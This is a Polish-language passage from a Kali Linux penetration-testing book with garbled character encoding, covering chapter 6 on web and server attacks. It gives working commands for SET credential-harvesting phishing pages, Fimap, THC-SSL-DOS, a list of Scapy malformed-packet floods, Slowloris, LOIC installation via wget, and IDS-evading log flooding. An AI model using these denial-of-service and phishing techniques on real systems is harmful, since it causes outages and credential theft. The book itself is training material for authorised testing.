prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
252
Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook
Na kolejnym rysunku przedstawiono okno przegl darki po czonej z serwerem o adresie127001 i wy wietlaj cej nasz fa szyw stron portalu Facebook Je eli wy wietlona stronanie wygl da przekonuj co mo esz u y innego szablonu albo po prostu sklonowa aktualnwersj danej strony
Zwroacute uwag e w pasku adresu przegl darki wy wietlany jest adres 127001 W wi kszo ciprzypadkoacutew b dziesz musia jednak u y nieco bardziej wyrafinowanych wektoroacutew atakuaby przekona u ytkownikoacutew do odwiedzenia Twojej spreparowanej strony internetowejMo esz to zrobi na wiele sposoboacutew na przyk ad poprzez rozsy anie do u ytkownikoacutew pocztelektroniczn specjalnie przygotowanej wiadomo ci zawieraj cej cze do Twojej spreparowanejwitryny internetowej (zobacz pierwszy rysunek na nast pnej stronie)
Kiedy u ytkownik rozpocznie wpisywanie nazwy konta i has a dost pu na naszej fa szywejstronie udaj cej witryn Facebook pakiet SET przechwyci ca y zwi zany z tym ruch sieciowyi nast pnie przekieruje u ytkownika do prawdziwej witryny internetowej Istnieje bardzo du-a szansa na to e po takim przekierowaniu u ytkownik b dzie przekonany e po prostu po-
myli si podczas wpisywania has a i zaloguje si jeszcze raz nie maj c wiadomo ci e bdquopodrodzerdquo pakiet SET przechwyci nazw jego konta i has o dost pu (zobacz drugi rysunek nanast pnej stronie)
Jak wida na powy szym rysunku pakiet SET przechwyci nazw naszego konta u ytkownikaDrChaos i nasze has o dost pu ILoveKali
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
253
Po zako czeniu tego wiczenia u yj kombinacji klawiszy Ctrl+C aby zako czy prac programuSET i wygenerowa raport w formacie HTML SET generuje profesjonalnie wygl daj cy ra-port ktoacuterego mo esz z powodzeniem u y podczas tworzenia raportu ko cowego z przepro-wadzonego testu penetracyjnego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
254
Fimap
Fimap to narz dzie napisane w j zyku Python przeznaczone do wyszukiwania i wykorzysty-wania podatno ci i luk w zabezpieczeniach aplikacji internetowych pozwalaj cych na przeprowa-dzanie atakoacutew typu LFI (ang Local File Inclusion) lub RFI (ang Remote File Inclusion)
Aby uruchomi pakiet Fimap w systemie Kali Linux przejd do grupy Kali Linux a nast pniewybierz polecenie Web ApplicationsWeb Vulnerability Scannersfimap Po wybraniu tegopolecenia na ekranie pojawi si nowe okno terminala z wy wietlonym ekranem powitalnympolecenia fimap Dla pakietu fimap istnieje roacutewnie kilka dodatkowych wtyczek ktoacutere mo eszpobra z internetu i zainstalowa za pomoc nast puj cego polecenia
fimap --install -plugins
Dost pne wtyczki zostan wy wietlone w formie listy z opcj pozwalaj c na zainstalowaniewybranej wtyczki lub zako czenie dzia ania polecenia Jak wida w naszym przyk adzie do-st pne s dwie dodatkowe wtyczki st d polecenie instalowania musimy wykona dwukrotnieindywidualnie instaluj c poszczegoacutelne wtyczki (zobacz pierwszy rysunek na nast pnej stronie)
Aby u y pakietu Fimap musisz najpierw poda adres URL witryny ktoacutera b dzie celem skaneraIstnieje wiele metod definiowania adresoacutew URL Mo esz na przyk ad poda jeden wybrany adresURL ca list adresoacutew URL mo esz u y wyszukiwarki Google do zebrania adresoacutew URL
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
Najcz ciej spotykana metoda ataku DoS polega na bdquozalewaniurdquo badanego systemu masowonap ywaj cymi z zewn trz daniami Takie przeci enie zazwyczaj skutecznie uniemo liwiasystemowi odpowiadanie na rzeczywiste dania od autoryzowanych klientoacutew lub co najmniejtak spowalnia wysy anie odpowiedzi e ca y system staje si dla klientoacutew praktycznie bezu-yteczny Ataki typu DoS mog by skierowane na zasoby systemu (np przypisana przestrze
dyskowa przepustowo po cze sieciowych itd) konfiguracj systemu (np usuwanie tablicroutingu) informacje o stanie systemu (np resetowanie sesji TCP) oraz ka dy inny elementrodowiska systemu ktoacuterego przeci enie mo e spowodowa zak oacutecenie jego normalnego
funkcjonowania
Roacute nica pomi dzy atakami DoS (ang Denial of Service) a DDoS (ang Distributed Denial of Service) polega natym e do przeprowadzania ataku DoS napastnik wykorzystuje tylko jeden komputer podczas gdy w przy-padku atakoacutew DDoS liczba maszyn bior cych udzia w ataku mo e si ga tysi cy Omawianie zagadniezwi zanych z atakami DDoS wykracza niestety daleko poza ramy naszej ksi ki
Istniej cztery g oacutewne kategorie atakoacutew DoSDDoS Ataki wykorzystuj ce przeci enie po cze sieciowych (ang Volume Based
Attacks) mdash taki rodzaj ataku jest zwi zany z bdquozalewaniemrdquo atakowanego systemumasowo nap ywaj cymi pakietami UDP ICMP i innymi Celem takiego ataku jestprzeci enie po cze sieciowych atakowanego systemu nadmiernymi ilo ciamiprzesy anych pakietoacutew
Ataki na protoko y komunikacyjne (ang Protocol Attacks) mdash ataki te maj na celunadmierne wykorzystywanie zasoboacutew urz dze sieciowych takich jak routeryzapory sieciowe urz dzenia roacutewnowa ce obci enie po cze sieciowychPrzyk adami atakoacutew na protoko y komunikacyjne s ataki typu SYN floodPing of Death Smurf Teardrop wymuszanie fragmentacji pakietoacutew itp
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
257
Ataki na warstw aplikacji (ang Application Layer Attacks) mdash takie ataki wykorzystujnormalny ruch sieciowy do zak oacutecenia dzia ania lub nawet spowodowania awariidanej witryny lub aplikacji internetowej Przyk adami mog by ataki typu Zero-Dayczy ataki wykorzystuj ce inne podatno ci i luki w zabezpieczeniach witryn i aplikacjiinternetowych
Ataki powoduj ce wyczerpanie zasoboacutew sesji (ang Session Exhaustion) mdash takieataki powoduj wyczerpanie liczby dozwolonych jednocze nie sesji poprzez ci g enawi zywanie nowych po cze bez zamykania starych sesji co prowadzido wyczerpania zasoboacutew systemu
W systemie Kali Linux znajdziesz wiele narz dzi pozwalaj cych na wykorzystywanie podat-no ci i luk w zabezpieczeniach Narz dzia te na przyk ad Metasploit mog by u ywane doprzeprowadzania atakoacutew DoS na warstw aplikacji (wiele z tych narz dzi omawiali my ju wewcze niejszych rozdzia ach) W rozdziale 3 prezentowali my popularne narz dzie Scapypozwalaj ce na przeprowadzanie atakoacutew DoS na protoko y komunikacyjne Poni ej znaj-dziesz omoacutewienie kilku kolejnych narz dzi s u cych do przeprowadzania atakoacutew DoS ktoacuteremo esz znale w systemie Kali Linux
Aby przetestowa skuteczno ataku DoS mo esz u y witryny httpwwwupordownorg ktoacutera sprawdzadost pno podanej witryny internetowej
THX-SSL-DOSProtokoacute SSL (ang Secure Socket Layer) jest u ywany do nawi zywania bezpiecznych po -cze i transakcji w internecie Nawi zanie bezpiecznego po czenia z wykorzystaniem proto-ko u SSL wymaga u ycia po stronie serwera 15 razy wi kszej mocy obliczeniowej ni po stro-nie klienta Atak typu THC-SSL-DOS wykorzystuje t dysproporcj przez proacuteb prze adowaniaserwera spreparowanymi daniami nawi zania sesji SSL a do momentu kiedy przeci onyserwer si poddaje i przestaje odpowiada na dania przesy ane od innych autoryzowanychklientoacutew Atak wykorzystuje mechanizm renegocjacji bezpiecznego po czenia SSL do gene-rowania tysi cy takich da dla pojedynczego po czenia TCP Z tego powodu atak ten jestroacutewnie znany jako atak typu SSL-Exhaustion (ang mdash bdquowyczerpanie zasoboacutew SSLrdquo) Zalettakiego podej cia jest to e mo liwo ci przetwarzania da nawi zania sesji SSL s znaczniewy sze po stronie klienta co oznacza e przeci tny laptop pod czony do sieci za po red-nictwem cza o przeci tnej szybko ci mo e rzuci powa ne wyzwanie niemal ka demu serwero-wi aplikacji internetowych Podatno serweroacutew internetowych na ataki typu SSL-Exhaustionjest powszechnie znana a mimo to nie uda o si jeszcze opracowa skutecznej metody zapo-biegania takim atakom
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
258
Aby uruchomi pakiet THC-SSL-DOS w menu g oacutewnym systemu przejd do grupy Kali Linuxa nast pnie wybierz polecenie Stress TestingWeb Stress Testingthc-ssl-dos Po wybraniu pole-cenia pojawi si nowe okno terminala z ekranem powitalnym polecenia thc-ssl-dos Sk adniapolecenia jest nast puj ca
thc-ssl-dos [opcje] ltadres IP ofiarygt ltportgt and --accept
W wierszu wywo ania polecenia musisz umie ci opcj --accept w przeciwnym wypadku otrzymaszkomunikat o b dzie przedstawiony poni ej
Po uruchomieniu programu THC-SSL-DOS zobaczysz na ekranie kilka zabawnych komuni-katoacutew informuj cych e dzia anie programu si rozpocz o Na pierwszym rysunku zamiesz-czonym poni ej wida e zaatakowana witryna nie obs uguje protoko u SSL st d programwy wietla na ekranie komunikat o wyst pieniu b du Na kolejnym rysunku przedstawionosytuacj w ktoacuterej pomy lnie rozpocz si proces renegocjacji sesji SSL co w efekcie mo edoprowadzi do zak oacutecenia dzia ania atakowanego systemu Pami taj ataki tego typu mo eszprzeprowadza tylko na systemach dla ktoacuterych uzyska e pisemne zezwolenie w a cicielaPrzeprowadzenie takiego ataku mo e doprowadzi do powa nego ograniczenia funkcjonalno-ci atakowanego systemu lub nawet do jego ca kowitego za amania
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
259
ScapyJednym z najpopularniejszych narz dzi s u cych do przeprowadzania atakoacutew typu DoS jestScapy Program zosta napisany w j zyku Python a jego autorem jest Phillippe Biondi Scapypozwala na tworzenie modyfikowanie i dekodowanie zawarto ci pakietoacutew sieciowych wstrzyki-wanie pakietoacutew do sieci przechwytywanie pakietoacutew oraz dopasowywanie da i odpowiedziProgram posiada roacutewnie wiele innych mechanizmoacutew takich jak skanowanie portoacutew traso-wanie pakietoacutew sprawdzanie urz dze sieciowych przeprowadzanie atakoacutew czy wykrywanieurz dze sieciowych
Jedn z cz sto wykonywanych operacji jest przechwytywanie pakietoacutew TCP i wysy anie ichdalej do sieci za po rednictwem programu Scapy Aby uruchomi ten program w oknie ter-minala wpisz polecenie scapy Po uruchomieniu programu b dziesz moacuteg wykonywa pole-cenia bezpo rednio z jego wiersza polece
W przyk adzie ktoacutery przedstawiamy poni ej sproacutebujemy u y pakietu Scapy do wysy aniaspreparowanych pakietoacutew TCP do naszego serwera testowego W naszym przypadku serwertestowy ma adres IP 10001 ale w realnym scenariuszu mo e to by dowolny router czyserwer WWW Oproacutecz podania adresu atakowanego serwera musimy roacutewnie okre li liczbpakietoacutew ktoacutere zostan wys ane do celu W naszym przypadku b dzie to 2000 pakietoacutew cze-go mo emy dokona za pomoc nast puj cego polecenia
send(IP(dst=10001ttl=0)TCP()iface=eth0count=2000)
Powoduje ono wys anie 2000 pakietoacutew z interfejsu sieciowego eth0 do serwera o adresie10001 Jak zapewne zauwa y e czas ycia wysy anych pakietoacutew (parametr ttl) jest ustawio-ny na warto 0 Z punktu widzenia protoko u TCP istnienie takich pakietoacutew jest niemo liweInaczej moacutewi c wysy aj c pakiety z tak spreparowan warto ci parametru ttl proacutebujemywprowadzi atakowany serwer internetowy co najmniej w zak opotanie W realnym scenariu-szu potencjalny napastnik wysy a by do atakowanego serwera miliony takich pakietoacutew Wartozauwa y e w sprzyjaj cych okoliczno ciach zak oacutecenie pracy czy nawet powa na awaria serweramo e by spowodowana odebraniem nawet jednego niepoprawnego czy specjalnie z o liwiespreparowanego pakietu sieciowego Oczywi cie w zale no ci od zamiaroacutew mo esz dowolniemodyfikowa poszczegoacutelne opcje wysy ania pakietoacutew
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
260
Poni ej przedstawiamy kilkana cie popularnych scenariuszy atakoacutew przeprowadzanych przyu yciu pakietu Scapy
Nieprawid owa wersja protoko u IP
send(IP(dst=10001 src=10203040 version=0) TCP(dport=www) iface=eth0 count=2000)
Nieprawid owa suma kontrolna pakietu TCP
send(IP(dst=10001)TCP(chksum=0x5555)iface=eth0count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi wyzerowane i numer sekwencji usta-wiony na 0)
send(IP(dst=10001)TCP(flags=seq=555)iface=eth0 count=2000)
Nieprawid owe flagi pakietu TCP (wszystkie flagi ustawione jednocze nie)
send(IP(dst=10001)TCP(flags=0x0ff)iface=eth0count=2000)
Ustawiona tylko flaga FIN
send(IP(dst=10001)TCP(flags=F)iface=eth0count=2000)
Rozmiar nag oacutewka wi kszy od rozmiaru pakietu L2
send(IP(dst=10001 src=10203040 ihl=15L)TCP(dport=www) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka pakietu
send(IP(dst=10001 src=10203040 ihl=2L)TCP(dport=www) iface=eth0 count=2000)
ICMP Flood
send(IP(dst=10001)ICMP()iface=eth0count=2000)
Nieprawid owa suma kontrolna pakietu IP
send(IP(dst=10001 src=10203040 chksum=0x5500) TCP(dport=www) iface=eth0 count=2000)
Fragmentacja pakietoacutew IP
send(IP(dst=10001 src=10203040 frag=1)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu IP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040 ihl=5L len=80) TCP(dport=www) iface=eth0 count=2000)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
261
roacuted owy adres IP taki sam jak docelowy adres IP
send(IP(dst=10001 src=10001)TCP(dport=www) iface=eth0 count=2000)
Rozmiar pakietu warstwy L2 wi kszy ni rozmiar pakietu IPsend(IP(dst=10001len=32) Raw(load=bla-bla-bla-bla-bla-blabla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)UDP(dport=80len=48) Raw(load=bla-bla-bla-bla-bla-bla-bla-bla)iface=eth0count=2000)send(IP(dst=10001len=32)ICMP() Raw(load=bla-bla-bla-blabla-bla-bla-bla)iface=eth0count=2000)
Brak pakietu warstwy L4
send(IP(dst=10001 src=10203040) iface=eth0 count=2000)
Jednocze nie ustawione flagi SYN i FIN
send(IP(dst=10001)TCP(flags=FS)iface=eth0count=2000)
Rozmiar nag oacutewka pakietu TCP wi kszy ni rozmiar pakietu warstwy L2
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=15L) iface=eth0 count=2000)
Zbyt ma y rozmiar nag oacutewka TCP (mniejszy ni 5 bajtoacutew)
send(IP(dst=10001 src=10203040) TCP(dport=www dataofs=1L) iface=eth0 count=2000)
Slowloris
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
262
Slowloris to klient HTTP ktoacutery umo liwia przeprowadzanie atakoacutew typu DoS nawet za po-rednictwem cza o wzgl dnie ma ej przepustowo ci Metoda ataku wykorzystywana w tym
programie jest unikatowa i pozwala na przeprowadzenie skutecznego ataku bez uciekania sido powszechnie wykorzystywanych technik bdquozalewaniardquo serweroacutew masowo wysy anymi pa-kietami Slowloris otwiera wiele roacutewnoleg ych po cze do atakowanego serwera i podtrzy-muje je w otwartym stanie poprzez przesy anie cz ciowych da HTTP Po otwarciu po -czenia program cyklicznie w regularnych odst pach czasu przesy a do serwera setkikolejnych nag oacutewkoacutew da co zapobiega zamkni ciu po czenia przez serwer Takie zacho-wanie powoduje wyczerpanie limitu roacutewnoleg ych sesji serwera co w efekcie uniemo liwiajego normalne dzia anie W przypadku witryn sieciowych przystosowanych do du ego nat -enia ruchu proces przejmowania kolejnych po cze przez pakiet Slowloris mo e zaj nieco
czasu poniewa inni u ytkownicy musz zwalnia swoje po czenia zanim b d one mog yzosta zaj te przez Slowloris Nie zmienia to jednak w niczym faktu e po pewnym czasieSlowloris poma u ale skutecznie przechwyci wszystkie dost pne sesje i doprowadzi do za-wieszenia dzia ania serwera
Program Slowloris dzia a skutecznie zw aszcza w odniesieniu do serweroacutew WWW wykorzy-stuj cych przetwarzanie wielow tkowe ktoacutere s z definicji wra liwe na ograniczanie liczby do-st pnych w tkoacutew Przyk adami takich serweroacutew s Apache 1x i 2x dhttpd GoAhead i inne
Pakiet Slowloris nie jest domy lnie instalowany w systemie Kali Linux 10 ale mo esz go pobra ze stronyhttphackersorgslowloris
Aby uruchomi program pobierz skrypt pl ze strony autora otwoacuterz nowe okno terminalaprzejd do katalogu ze skryptem i wykonaj polecenie przedstawione poni ej
perl slowlorispl
W oknie terminala pojawi si ekran pomocy programu Aby rozpocz atak na wybrany serwerpowiniene wpisa polecenie przedstawione powy ej i doda opcj -dns a po niej wpisa adresserwera b d cego celem ataku Aby zaatakowa na przyk ad witryn wwwthesecuritybloggercompowiniene wpisa nast puj ce polecenie (zobacz pierwszy rysunek na nast pnej stronie)
perl slowlorispl -dns thesecuritybloggercom
Po rozpocz ciu ataku b dziesz moacuteg obserwowa w oknie terminala proces przejmowaniakolejnych po cze co po pewnym czasie mo e doprowadzi do za amania si atakowanegosystemu (zobacz drugi rysunek na nast pnej stronie)
Je eli atak przeprowadzany za pomoc pakietu Slowloris si powiedzie atakowany serwerprzestanie odpowiada na dania (zobacz trzeci rysunek na nast pnej stronie)
Powy ej mo esz zobaczy skutki ataku DoS na witryn httpwwwthesecuritybloggercom (prosimy niepowtarzaj tego eksperymentu)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
263
LOIC czyli Niskoorbitalne Dzia o JonowehellipPakiet LOIC (ang Low Orbit Ion Cannon czyli wspomniane w tytule podrozdzia u Niskoorbital-ne Dzia o Jonowe) to narz dzie do badania odporno ci zasoboacutew sieciowych na przeci enieLOIC pozwala na sprawdzanie ilo ci ruchu sieciowego jaki mo e obs u y dany system Ta-kie informacje mog by poacute niej wykorzystywane do planowania rozbudowy i wdra ania sze-rokopasmowych po cze sieciowych Program ten sta si inspiracj do utworzenia innych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
264
narz dzi o podobnej funkcjonalno ci takich jak na przyk ad JavaScript LOIC ktoacutere pozwalau ytkownikowi na przeprowadzanie testoacutew odporno ci na przeci enia po cze bezpo red-nio z poziomu przegl darki
Program LOIC by wykorzystywany przez grup Anonymous do przeprowadzenia s ynnychatakoacutew na wiele znanych internetowych witryn publicznych i rz dowych Niektoacuterzy prawnicyusi uj co prawda przekonywa e zastosowanie narz dzi takich jak LOIC jest w praktycebardzo podobne do odwiedzania danej witryny kilka tysi cy razy ale w wi kszo ci krajoacutewnieautoryzowane u ywanie tego typu narz dzi jest traktowane jako amanie prawa
Aby zainstalowa pakiet LOIC powiniene otworzy okno terminala i wpisa sekwencj po-lece przedstawion poni ej
apt-get updateaptitude install git-core monodevelopapt-get install mono-gmcs
Po zako czeniu tego etapu wykonaj polecenie cd Desktop aby przej do katalogu reprezentuj -cego pulpit a nast pnie utwoacuterz w nim podkatalog o nazwie loic Mo esz to zrobi za pomocpolecenia przedstawionego poni ej
mkdir loic
Przejd do nowo utworzonego katalogu za pomoc polecenia cd loic i wykonaj polecenieprzedstawione poni ej
wget httpsrawgithubcomnicolargoloicinstaller masterloicsh
Nast pnie nadaj skryptowi loicsh odpowiednie uprawnienia Aby to zrobi wykonaj kolejnepolecenie
chmod 777 loicsh
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
265
Ostatnim etapem jest uruchomienie skryptu za pomoc polecenia przedstawionego poni ej
loicsh install
Je eli na ekranie nie pojawi si aden komunikat o wyst pieniu b du to znaczy e jestegotowy do przeprowadzenia aktualizacji naszego bdquodzia a jonowegordquo Aby to zrobi wykonajnast puj ce polecenie
loicsh update
Po zako czeniu aktualizacji nadszed czas na uruchomienie programu LOIC Mo esz to zro-bi wpisuj c w oknie terminala nast puj ce polecenie
loicsh run
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
266
U ywanie programu LOIC nie jest trudne Na pocz tek mo esz wybra czy chcesz korzystaz trybu r cznego (ang manual mode) czy trybu IRC (ang IRC mode) W naszym przyk adziewybrali my tryb r czny
Nast pnie powiniene poda adres URL systemu ktoacutery chcesz zaatakowa W naszym przypadkuwpisali my adres lokalnego interfejsu p tli zwrotnej czyli 127001 Je eli chcesz zmodyfi-kowa domy lne ustawienia ataku LOIC oferuje wiele opcji dla protoko oacutew TCP oraz UDP
Kiedy b dziesz gotowy do rozpocz cia ataku powiniene klikn przycisk IMMA CHARGINMAH LAZER Post py ataku mo esz obserwowa w oknie programu Aby zatrzyma atakkliknij przycisk Stop Flooding
Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
